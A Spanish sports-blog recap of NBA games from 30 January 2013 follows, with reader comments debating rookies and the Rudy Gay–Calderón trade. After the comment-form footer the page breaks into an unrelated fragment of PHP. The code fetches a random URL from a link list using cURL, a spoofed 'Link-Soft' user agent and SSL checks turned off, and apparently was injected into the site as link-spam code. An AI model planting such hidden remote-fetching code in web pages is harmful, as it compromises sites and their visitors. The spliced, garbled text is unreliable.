La Crónica: Consolidando la fórmula

30 de January de 2013 por Pop

Jornada sin sorpresas la de anoche, si es que podemos considerar a estas alturas como no sorprendente la tercera victoria consecutiva de los Lakers, esta vez ante los Hornets.

De nuevo hemos visto a Kobe en labores de playmaker, con Nash abierto para el tiro, con resultados calcados a los 3 últimos partidos: Bryant rozando el trible doble (lleva 39 asistencias en los 3 últimos partidos, la mejor racha de toda su carrera) y sus Lakers ganando el encuentro. Clark sigue siendo una de las sorpresas agradables de este 2013 y esta vez sí Howard fue dominante en ambas pinturas. El banquillo también funcionó a la perfección, con Pau dando minutos de mucha calidad como 6º hombre, amén de la buena aportación de Meeks y Jamison. Los Hornets dieron batalla hasta el final (106-111), con un Eric Gordon especialmente acertado y con Greivis Vasquez como director de orquesta. Después de muchos experimentos, D’Antoni parece haber encontrado una fórmula táctica eficaz, aunque está por ver cómo funciona ante equipos de más empaque que los Hornets. Los angelinos tienen ahora una gira de 7 partidos fuera de casa.

En Portland nos pudimos deleitar con un final de partido colosal de Aldridge, que con un triplazo a falta de 5 segundos empataba el encuentro y que daba la victoria a su equipo con una preciosa canasta final sobre la bocina tras la pérdida de balón de Mayo (104-106). Culminaba así la remontada de los Blazers ante Dallas después de empezar la segunda mitad 19 puntos por detrás. Tanto Hickson como el propio Aldrigde estuvieron imperiales y consiguieron entre ambos 55 puntos y 28 rebotes. Por los Mavericks, que estuvieron blanditos en defensa, la buena noticia es la patente evolución de Nowitzki. A nada que el alemán siga esta línea los otrora campeones pueden intentar el asalto a unas posiciones de playoffs de las que ahora mismo están fuera. 

Victoria de uno de los equipos de moda, los Warriors, ante unos Cleveland Cavaliers que en ningún momento tuvieron opciones de llevarse el partido (108-95). Los de San Francisco, que jugaron sin Curry, Landry, Barnes ni el recientemente recuperado Bogut, bombardearon a los locales desde el perímetro (11 triples de 16 intentos), con Klay Thompson y Jarrett Jack prácticamente imparables. David Lee se unió a la fiesta quedándose a las puertas del triple doble. Por los de Cleveland el mejor fue Tristan Thompson, mientras que pudimos ver a un Irving especialmente errático en el tiro.

Para terminar, victoria cómoda de los Bucks ante unos Pistons que se disolvieron cual pastilla efervescente tras el primer cuarto (117-90). Brandon Jennings consiguió él solito un parcial de 16-0 en el tercer cuarto y acabó con 30 puntos. Ellis terminó con 14 puntos y 6 robos de balón y los jugadores del banco de Milwaukee acabaron jugando muchos minutos. Los Pistons estuvieron realmente flojos a partir del segundo cuarto, en el cual permitieron un sinfín de segundos tiros a sus rivales. A partir de ahí se encontraron fuera del partido. Destaca el gran partido del rookie Drumond, 18 puntos y 18 rebotes.

PREMIOS

MVP: De parejas y tríos va hoy el premio. Por un lado, Lamarcus Aldridge y JJ Hickson  que se combinaron para anotar 55 puntos y capturar 28 rebotes. Además Lamarcus anotó el tiro de la victoria. Por el otro, el trío de los Warriors formado por David Lee, Jarrett Jack y Klay Thompson, simplemente inconmensurable.


Rookie:
Premio al mejor rookie y al de mayor esfuerzo en vano del día. Andre Drummond anotó 18 puntos y capturó 18 rebotes pero no pudo evitar que los Bucks arrollaran a su equipo. Damian Lillard y Anthony Davis estuvieron bastante flojos así que destacamos en su lugar a Tyler Zeller que se fue a casa con 16 puntos, 3 rebotes y 5 asistencias.

Sorpresa: Ya están todos sanos y Earl Clark sigue saliendo de titular, y no solo eso sinó que sigue aportando. Ayer fueron 20 puntos (8 de 11), 12 rebotes y 4 asistencias.

Decepción: Malos días para Al-Farouq Aminu y Alonzo Gee. Los dos se fueron al vestuario sin anotar ni un solo punto.

Esfuerzo en vano: Premio para Andre Drummond pero para no repetir destacamos también a Greivis Vasquez (15-15) y Darren Collison (17-4-9-3).

Imágenes | AP Photos / Getty Images

Comenta

35 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Earl Clark -de chiripa- y MWP,los dos aportes de D’Antoni.Siempre se ha defendido que Clark se merecía un hueco en la rotación,ya desde los tiempos de Orlando Magic,pero se hace difícil pensar que pudiera dar este nivel.Es titularísimo en los Lakers,respondiendo a gran altura ante una oportunidad inesperada,si bien creo que se beneficia por el sistema de D’Antony y que en otro equipo no haría estos números,pero bueno,es buen jugador,y en este momento un buen pegamento.

    Genial Drummond,poco a poco va haciéndose un hueco en la NBA.Si nada se tuerce estaremos hablando en 1-2 temporadas de un gran jugador.Jugador más joven en hacer 18-18,casi nada.

    Y por último Aldridge,eclipsado por Lillard en gran parte de la temporada,se han oido voces que desmerecen su elección para el All Star,y que debería haber sido Lillard el elegido si hay que etiquietar como All Star a alguno de Portland.¡Pero qué clase tiene!Mala suerte de haber caido en un equipo que hará que no pase a la historia como un pedazo de AP,que lo es.Aún con todo,muchísimo mérito tienen los Blazers con esa mierda de banquillo,estar donde están.El entrenador tiene su mérito supongo.

      Citar

  2. Esteban dice:
    #2

    al fin algo bueno se olfatea en lños lakers y mas alla de las 3 vistorias seguidas este puede ser su momento

    d´antoni hiz algunas cosillas para perder puntos a la hora de ser considerado EL PEOR TECNICO DE LA HISTORIA y esta funcionando, ayer jugaron y respondieron bien, los dos jugadores que eran llamados a cargar con la banca del equipo, MEEK y JAMISON, q por esas cosas inexplicables del bueno de MIKE, estaban borrados

    con el regreso de blake (no por que me guste, pero al menos no volveremos a ver a duhon ni morris, madre mia), y pau saliendo desde el banco, si dantoni mantiene en la rotacion a meks y jamison, la banca de los lakes, de repente puede ser considerada muy muy peligrosa

    mientras que la aparicion de CLARK es increible, este chaval hasta mete triples! ayer 20 puntos y 12 rebotes, numeros que son dignos de DH12, tremendo lo este gurrimin, lo siento pau, pero por lejos clark ha rendido mas que tu y se gano el puesto de titular, mas si puede convertir los triples

    con kobe menos preocupado por ser el lider anotador de la liga, estos lakers pueden llegar a PO, y mientras esquiven a los spurs y al thunder en primera ronda… quien sabe

      Citar

  3. Esteban dice:
    #3

    lo de drummond es sorprendente, no esta haciendo unos numeros que servirian para justificar un puesto uno en el draft como siempre se hablo, pero tampoco esta tan lejos, su potencial es el cielo mismo, un howard en potencia, algo menos bueno en ataque, pero una cosa similar

    igual es dificil pensar por ensima de quien podria ser elegido, no de davis, no de lillard, no de MKG ni de beal, quiza sobre robinson, waiters y ross, pero tambien tengo mis dudas

    un draft exelente, un top 10 solo amargado por RIVERS

      Citar

  4. Esteban dice:
    #4

    a esos 10, habria que sumarle a jugadores que estan jugando bien como jenkins, wroten, henson, leonard, nicholson, hackless, sullinger, zeller entre otros

    los potenciales que aun no han jugaod como jeremy lamb, perry jones, terrence jones, teague, fournier y un kendall marshall

    puede ser una camada gloriosa

      Citar

  5. Jose Luis dice:
    #5

    Con lo que se valoran los Pívots, bien podrían haberlo elegido por delante de MKG y de Beal.

      Citar

  6. Esteban dice:
    #6

    Jose Luis:
    Con lo que se valoran los Pívots, bien podrían haberlo elegido por delante de MKG y de Beal.

    eso visto hoy en dia, pero me da la sensacion que el techo de beal y de MKG es tan o mas alto que el de drummond

      Citar

  7. melo15 dice:
    #7

    Nose Esteban lo del potencial es muy relativo sino mira a Tyreke Evans que despues de una super temporada rookie al final no sera nada destacable.
    Creo que los tres puden llegar a ser grandes jugadores porque esta temporada estan demostrando bastante potencial aunque Beal y MKG esta siendo mas irregulares, sobretodo el segundo.

      Citar

  8. Jose Luis dice:
    #8

    No digo que vaya a ser mejor o peor que MKG o Beal esteban, sino que viendo como se pagan los pívots, debió haber salido antes. Los pívots escasean mucho más que los aleros o escoltas.

      Citar

  9. Denise dice:
    #9

    Esteban: eso visto hoy en dia, pero me da la sensacion que el techo de beal y de MKG es tan o mas alto que el de drummond

    Pivots dominantes hay pocos mientras que escoltas jugones hay muchos…no sé que numeros haría Drummond en la NCAA pero para mi es junto a Lillard el que mas futuro tiene de los rookies.
    El unicejo Davis de momento me deja mas frío.

      Citar

  10. nba dice:
    #10

    Cuanto merito la victoria de Warriors
    Buena noticia para Lakers la vuelta de Blake.
    A pesar del poco acierto de Pau en el tiro, victoria, veremos si Pau es capaz de asumir su nuevo rol en el equipo
    Mas vale que Houston afloje el ritmo, ya que sino va a ser imposible para Dallas y Lakers aspirar a entrar en playoff

      Citar

  11. Jose Luis dice:
    #11

    Los peores tiradores en cada zona (supongo que con un mínimo de tiros, no porque uno haga 0-1 es el peor)

    http://www.grantland.com/blog/the-triangle/post/_/id/49283/courtvision-the-worst-shooters-so-far

    Josh Smith por duplicado, ese jugador que muchos creen que debería ir al all-star… su temporada ofensiva es pésima, y su selección de tiros, igual.

      Citar

  12. Jose Luis dice:
    #12

    Por cierto…¿ Bledsoe + Butler por Pierce? Bledsoe sería un base bastante decente mientras Rondo se recuperar, y podría ser suplente o jugar de 2 cuando Rondo vuelva. Butler no sé si tendrá garantizado el contrato entero, pero aunque lo tenga, son 16 millones, lo que tiene Pierce sólo para este año. Haría falta algún equipo más en el trade, pero podría funcionar para todos.

      Citar

  13. Esteban dice:
    #13

    si vamos que drummond tiene futuro de ser un tyson chandler, pero no mas que eso, beal para mi puede ser no solo un buen escolta, tiene el fisico y la mecanica de tiro poara ser un goleador de 23 o 25 puntos por partido si esta bien acompñada, incluso en el 2013 ya tiene una cifra anotadora de 17 o 18 puntos y en alza

    mientras que MKG es una apuesta casi segura, exelente defensor, muy intenso el juego, largo rapido y atletico, el futuro suyo como 3 titular a largo plazo de esta liga es incuestionable, no sera mas que un paul george o la meor version de gerald wallace o ron artest, pero es una apuesta muy segura

    los jugadores con grandes fisicos, energicos y con ganas de defender, siempre encuentran un buen lugar en la nba (que lo siga shefolosha, bowen, leonard, el propio george etc)

    drummond tiene un techo altisimo pero un piso mjuy bajo, incluso vi su primer juego en la liga de verano y era tan incordinado, tiraba libres tan mal y parecia entender tan poco el juego que por un momento pense que estaba frente a thabeet, por eso su apuesta era harto riesgosa

      Citar

  14. franitis dice:
    #14

    Ojo con Detroit y sus pivots (Monroe y Drummond) ¿A cuánto cotiza el kg. de Center a día de hoy?

      Citar

  15. melo15 dice:
    #15

    Esteban, no veia a Howard a los 18 años pero me apuesto algo a que era casi igual que descordinado que Drummond y que tambien vivia de rebotes ofensivos y alley-oops.
    Ademas Drummond tiene bastante vision i si trabaja ha de mejorar en ataquem
    Yo creo que su techo es como el de Howard.
    Sobre Beal yo tambien creo que sera un gran anotador y de MKG esperaba un poco mas esta temporada, porque en los ultimos partidos no ha hecho practicamente nada. Pero creo que tiene mas techo que Artest.

      Citar

  16. Denise dice:
    #16

    Jose Luis:
    Los peores tiradores en cada zona (supongo que con un mínimo de tiros, no porque uno haga 0-1 es el peor)

    http://www.grantland.com/blog/the-triangle/post/_/id/49283/courtvision-the-worst-shooters-so-far

    Josh Smith por duplicado, ese jugador que muchos creen que debería ir al all-star… su temporada ofensiva es pésima, y su selección de tiros, igual.

    El grafico mola…pero no criticaría a Josh Smith por estar ahí….tambien aparece Chris Paul y su calidad está fuera de toda duda.

      Citar

  17. Denise dice:
    #17

    Esteban:
    si vamos que drummond tiene futuro de ser un tyson chandler, pero no mas que eso, beal para mi puede ser no solo un buen escolta, tiene el fisico y la mecanica de tiro poara ser un goleador de 23 o 25 puntos por partido si esta bien acompñada, incluso en el 2013 ya tiene una cifra anotadora de 17 o 18 puntos y en alza

    Drummond tiene pinta de que va a tener mas recursos que Chandler. No me gusta comparar jugadores a base de números porque el baloncesto es algo más que estadísticas, y más para un tío como Chandler con la de intangibles que aporta, pero estamos hablando de un tío cuyos maximos registros son 11 puntos – 11 rebotes de media jugando una minutada en Hornets al lado de Chris Paul que le dejaba un huevo de canastas preparadas solo para machacar. Y este buen rookie llamado Drummond en un solar como Detroit jugando un cuarto y medio promedia ya en su año rookie casi 8 puntos y 8 rebotes.
    Para mi va a ser un crack y lo mas parecido Howard en los ultimos años, de hecho era el tapado mio en la Hoops pero algun crack se me adelantó.

      Citar

  18. Jose Luis dice:
    #18

    Si Denise, pero Chris Paul no vive de sus puntos (y menos de sus triples) vive de su dominio del juego, sus asistencias, su hacer jugar al equipo. De todas formas, ser el peor de la NBA en dos sitios distintos, y tan cercanos al aro, da mucho que pensar.

    Artículo en la ESPN sobre jugadores que están destruyendo las ofensivas de sus equipos:

    Josh Smith, Hawks
    Josh Smith, anotador de tiros en salto, ha tomado siete intentos de triples y ha encestado uno solo. Josh Smith, anotador de tiros en salto, ha intentado 29 de dobles desde más a 10 pies y ha anotado solamente tres. Josh Smith, anotador de tiros en salto, está matando la ofensiva de los Hawks.

    Lo que es tan enloquecedor es que Josh Smith, jugador de básquet, es muy valioso en otros aspectos. Tiene visión de cancha, logra rebotes, defiende, puede terminar tiros en el aro y tiene un buen juego de poste. Cuando no está encestando tiros en salto tiene un porcentaje de 53.8 en esta temporada. Agreguen los tiros en salto y tiene un 39.8 por ciento con un PER récord por lo bajo. Le voy a pedir una vez más, con mucho cariño: abandona los tiros en salto, Josh.

      Citar

  19. Esteban dice:
    #19

    digo de drummond no le veo fundamentos ofensivos, no por que no pueda hacer puntos, por que de hecho los hace via lob o rebotes ofensivos, pero no lo veo superando una doble marca o lanzando suaves ganchos, cosa que si hacia DH12
    hablando de este numero su año rookie, promedio 12 puntos y 10 rebotes, tampoco tanto mejor que drummond, que va en alza con sus numeros, podria terminar la temporada con un 10 y 8,

    detroit la ha cagado bien feo con los contratos de prince y stuckey, millonadas para dos tios que no sacan de pobre a nadie, y por no amnistiar a villanueva, que a esta altura quiza ni lo hagan
    aparentemente stuckey no tiene contrato garantizado, asi que espero q sea cortado, sumado a los 11 millones de expiring que deja maggete, los 5 de maxiell, 3 de bynum y una amnistia a villanueva, tendran un buen buen espacio que de saber utilizarlo los estaria ponieno de cara a los PO, pudiendo incluso fichar alguna estrellita, como monta ellis, granger o josh smith

    un nucleo, con la dupla interior MONROE-DRUMMNOD, mas jerbko desde el banco, un base joven como knight, otro joven como singler y un veterano con fama de cumplidor como prince, mas unos 40 millones para gastar deberia dar una vuelta de pagina en los pistons

      Citar

  20. Ruxixón dice:
    #20

    Yo es que Josh Smith para mí es AP,uno atlético,con buena capacidad reboteadora y que cerca de canasta puede generar muchos puntos mientras que a cancha abierta es un filón.Aporta mucha intensidad.Por contra sus tiros de media y larga distancia dejan mucho que desear,para mí es un auténtico dolor verlo de SF,lo vengo diciendo hace muchos años y no cambia para nada.Para mí es un segundo espada de un equipo,nunca jugador franquicia y por tanto que se pida un máximo me parece una sobrada.Los Hawks se deshicieron del desorbitado contrato de JoJo,entonces jugador franquicia,no veo visos que vayan a ofrecerle los 17 millones que puede llegar a conrar,si no me equivoco.

      Citar

  21. Ruxixón dice:
    #21

    Rumores muy fuertes de Rudy Gay a Raptors con Haddadi,Ed Davis y Calde serían los activos que dan en Toronto,si bien Calde iría a un tercer equipo,se comenta Detroit o Dallas

      Citar

  22. MagicJohnson32 dice:
    #22

    Parece hecho así:
    Prince, Daye y Ed Davis a Memphis
    Calde a Detroit
    Rudy Gay y Hamed Haddadi a Toronto

      Citar

  23. Simon dice:
    #23

    Para mí que Detroit corta a Calderon. A ellos no les sirve para nada, esta temporada no les sirve para nada pues ya no optan a nada… y no creo que Calde renueve en Detroit.

      Citar

  24. Pop dice:
    #24

    Pues se confirma la operación, los Raptors se hacen con Gay y Haddadi a cambio de Davis y Calderón. El siguiente movimiento sería de los Grizzlies, mandando a Calde a Detroit a cambio de Prince, Daye y una segunda ronda del draft, pero este segundo paso no se confirma todavía.

      Citar

  25. Simon dice:
    #25

    se me cortó el mensaje anterior. Decía que no creo que Calde renueve en Detroit, tampoco ellos van a ofrecerle un contrato muy alto. Pero ahora mismo posiblemente Detroit sea de las franquicias mas ahogadas y condenadas al fracaso de la NBA. Es uno de los equipos menos visto ( creo que el que menos ), la ciudad por lo que cuentan está en auténtica crisis al parecer la poblacíón está bajando mucho. En definitiva que es una ciudad deprimida y casi abandonada, un poco como la franquicia. Calde elegirá para la temporada que viene algún aspirante para intentar ganar su anillo. En Oklahoma iría de perlas para dar minutos de calidad a Westbrook e incluso jugar a su lado algunos minutos. A ver que pasa pero apostaría todo mi dinero a que Calde no juega más allá de lo que queda de esta temporada en Detroit… ( si acaso… )

      Citar

  26. HisRoyalAirness dice:
    #26

    A Calderón le viene perfecto porque así cambia de dinámica y puede hacer buenos números para conseguir otro contrato decente.

    No entiendo muy bien lo de Grizzlies. Vale que el contrato de Gay es un lastre pero si eres un verdader “contender” me parece absurdo quitar a uno de tus 2 principales anotadores a mitad de temporada. Ojalá les salga bien

      Citar

  27. Pikerton64 dice:
    #27

    Gonzalo Vázquez es el hombre (tuiter o blogs).

    Detroit y Calde:
    Toronto se hace con Gay, alero que todos conocemos, para que haga compañía a Lowry y Valanciunas (podríamos añadir a Ross, pero de los rookies se encarga Melo) (Sí, Jonas también es rookie, lo sé). Me parece bien, teniendo en cuenta que en verano Calderon se podía ir gratis a Dallas o cualquier otro equipo.

    Memphis se deshace del contrato de Gay, obteniendo a cambio a un profesional como Prince. No está tan fresco como antes, o Gay, pero de eso ya se encargan Marc, Conley o incluso Davis. Z-Bo líder absoluto en ataque y el juego de MEN se centrará en él. Se les puede recriminar haberse deshecho de sus principales tiradores de perímetro Ellingtony Gay. Luxury tax les mató. Ed Davis me gusta.

    Detroit reconstruye a futuro. Dumars. Se deshacen del salario de Prince y a finales de temporada expiring de Calderon ($10 M), Maggete (otros 10) y Maxiell. En total se ahorrarán más de $40 millones. Se quedan como núcleo central (modelo OKC) con Brandon Knight, Andre Drummond y Greg Monroe, a los que habría que añadir Singler y Jerebko.

    Conclusiones: En el caso de Memphis y Detroit el movimiento ha sido totalmente económico, vaciar salarios. Solo Toronto ha ido a por jugadores, pero hay quien dice que la NBA actual es así. No veo partidos de Memphis, Toronto o Detroit, pero pienso que ningún equipo pierde con el trade, o si lo hace ese es Memphis. Si Memphis planea dirigir su juego sobre su pareja interior Gay molestaba, si necesitaba la bola. Se quedan con un buen quintento y buena pareja interior suplente, aunque leo que quizás han perdido banquillo. Toronto no ganará el anillo, pero del año pasado a este ha pasado a tener dos calibre AllStar, creo, en Lowry (aunque este con las lesiones ahí) y Gay. Valanciunas tiene futuro y lo que han perdido no es gran cosa. Davis es bueno pero Gay es mejor y Calde probablemente se iba este año (Dallas, OKC, LAL, etc, aunque no sé). Y la vaciada de salario de Detroit es bestial, que se puede quedar 40 Millones por debajo del límite salarial teniendo a esos cinco jugadores de futuro que dije antes (más el drafteado de este año).

      Citar

  28. Esteban dice:
    #28

    exelente trade, todos salen ganando para mi gusto, increiblemente bueno

    menphis pierde cierto potencial sin gay, pero tampoco nos engañemos, siempre en los grizzlies ha estado en la discución que tan biuenos eran con gay o sin gay, cortaron por lo sano, muchos millones menos y un prince que puede acoplarse a esa dura defensiva, y aportar en otros apartados,
    esto significa que z-bo debera retomar las riendas ofensivas e irse por sobre los 20 putnos mas seguido, muchas jugadas de aclarado para el como en el año de semifinal de conferencia,
    ademas suman un joven prostecto interesante como davis
    por otra parte, menphis no parece un candidato claro al titulo, techo segunda ronda si lo lograban con gay, y no mas, por ende, no esta tan mal bajar la nomina
    es cierto sin gay su techo es algo mas bajo, pero con gay tampoco era tan alto

    detroir se saca de ensima un prince que ya no encajaba en la reconstruccion, con el expiring de calde, maggete, maxiel y bynum, mas una probable amnistia a villanueva y el contraro no garantizado de stuckey, tendran ocupado la modica suma de 15 millones la proxima temporada, con jugadores jovenes y prometedores, y una espacio para hacerse con dos estrellas de primer calibre (cosa que no sucedera), pero sufiente espacio para hacer trade asumiendo contratos que esten a la venta, granger me suena mucho! calderon y su expiring debia ser usado y es logico

    toronto suma talento joven a un nucleo aun mas joven y no lo veo mal, en la agencia libre,m nadie quiere ir a toronto asi que sumar un hombre de 20 puntos por juego es via trade, como sucedio con lowdry
    pierden a calderon que ayudaba a ganar juegos en una temporada donde no querian ganarlos y que esta destinada a loteria, asi q es logico
    lowry-ross-gay-bagnani-valanciunas, a alguien no le parce un super equipo joven y con futuro?

    en mi opinion un trade que cierra por donde se lo mire

      Citar

  29. Esteban dice:
    #29

    ah me olvidaba a derozan en canada, y bueno COLANGELO LO HACE DENUEVO!
    un equipo exelente con un promedio de edad aun mas exelente

      Citar

  30. Esteban dice:
    #30

    ooootro tema, okafor se sale denuevo, 15 PUNTOS y 17 REBOTES!!!

    que renacer, y pensar que el bueno de esa camada iba a ser HOWARD jajajajaja la tortilla se dio vuelta este año

      Citar

  31. franitis dice:
    #31

    Suns corta la racha de LAL, que no gana fuera de casa desde el 22 de diciembre. Otro hachazo a Howard le ha hecho resentirse de su hombro y se marchó a 6:57 del último cuarto, ganando los angelinos 78 a 73, ahora que parecía remontar el vuelo…

    Boston suma su segunda victoria consecutiva, sin Rondo… Ojo que a Sullinger le empieza a dar problemas su espalda y se tuvo que retirar del partido (saliendo de titular en perjuicio de Bass, jugando solo 4 minutos). Como esperábamos, Bradley salió de la partida como base, aunque Terry tuvo más protagonismo a lo largo del partido en ese puesto.

      Citar

  32. Denise dice:
    #32

    No entiendo mucho toda la normativa de traspasos, pero supongo que Detroit le hará a Calderón un buy-out de éstos y acabará jugando por el minimo hasta final de temporada en algun grande (¿Oklahoma, Miami, Spurs?).

    Ninguno pierde con el trade, Detroit se ahorra un huevo de dinero para los proximos años, a Toronto se le quedo un quinteto muy bueno (aunque Lowry, Gay y De Rozan necesiten un balon cada uno) pero lo de Memphis sin ser malo, no lo entiendo. Primero porque tienes opciones de anillo y el traspaso de Gay sería mejor hacerlo a final de temporada. Y después…por qué traspasas a Speights? para traer ahora a Ed Davis?? . Con Allen y Prince forman un buen perimetro defensivo, pero demasiado poco anotador. Lo proximo creo que será traspasar a Zach Randolph por un par de jugadores exteriores y jugarsela con Ed Davis de 4 titular.

      Citar

  33. melo15 dice:
    #33

    Pues to no entiendo el traspaso para nada,solo con los Pistons tiene algo de sentido.
    Ahora me he de ir al cole pero ya escribire mas tarde.

      Citar

  34. Simon dice:
    #34

    Yo el traspaso por parte de Memphis no lo entiendo, si, a corto plazo quizá no se vean afectas por que han conseguido a tres buenos jugadores que le spueden venir muy bien. El problema principal es el mensaje que han mandado a futuros agentes libres que lo que primerá será el factor económico, porque si teniendo un equipo aspirante traspasan a uno de los mejores para ahorrar… que harán cuando sea un simple equipo de mitad de tabla…

      Citar

  35. Denise dice:
    #35

    Simon: Yo el traspaso por parte de Memphis no lo entiendo, si, a corto plazo quizá no se vean afectas por que han conseguido a tres buenos jugadores que le spueden venir muy bien. El problema principal es el mensaje que han mandado a futuros agentes libres que lo que primerá será el factor económico, porque si teniendo un equipo aspirante traspasan a uno de los mejores para ahorrar… que harán cuando sea un simple equipo de mitad de tabla…

    Ya, la imagen de Memphis de cara al exterior es el de vamos a ser un equipo siempre por debajo del limite salarial y solo tendremos un equipo ganador si tenemos la suerte de poder juntar a 4-5 rookies, sophomores o jugadores en 3º año de mucha calidad.
    Mal futuro el de Memphis si renuncian a una posibilidad de anillo por unos cuantos millones menos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>